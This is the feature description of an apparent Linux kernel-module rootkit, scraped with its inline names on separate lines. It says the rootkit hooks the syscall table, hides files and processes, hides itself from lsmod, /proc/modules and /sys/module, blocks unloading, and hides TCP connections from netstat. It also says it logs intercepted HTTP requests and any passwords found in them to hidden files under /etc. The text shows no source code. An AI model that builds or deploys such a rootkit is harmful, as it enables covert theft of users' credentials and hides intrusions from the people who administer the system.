Yet another LKM rootkit for Linux. It hooks syscall table. Features: Hide files that ends on configured suffix (FILE_SUFFIX - ".rootkit" by default).
FILE_SUFFIX
COMMAND_CONTAINS
Examples:
.//./malicious_process
wget http://old-releases.ubuntu.com/releases/zesty/ubuntu-17.04-desktop-amd64.iso .//./
- Intercept HTTP requests.All intercepted GET and POST HTTP requests are logged to /etc/http_requests[FILE_SUFFIX].When password is found in HTTP request it's additionally logged to /etc/passwords[FILE_SUFFIX].
/etc/http_requests[FILE_SUFFIX]
/etc/passwords[FILE_SUFFIX]
- Rootkit module is invisible in lsmod output, file /proc/modules, and directory /sys/module/.
lsmod
/proc/modules
/sys/module/
rmmod
UNABLE_TO_UNLOAD
- Netstat and similar tools won't see TCP connections of hidden processes. Configuration: The configuration is placed at the beginning of file rootkit.c.Below is a default configuration:
rootkit.c
Linux x 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 GNU/Linux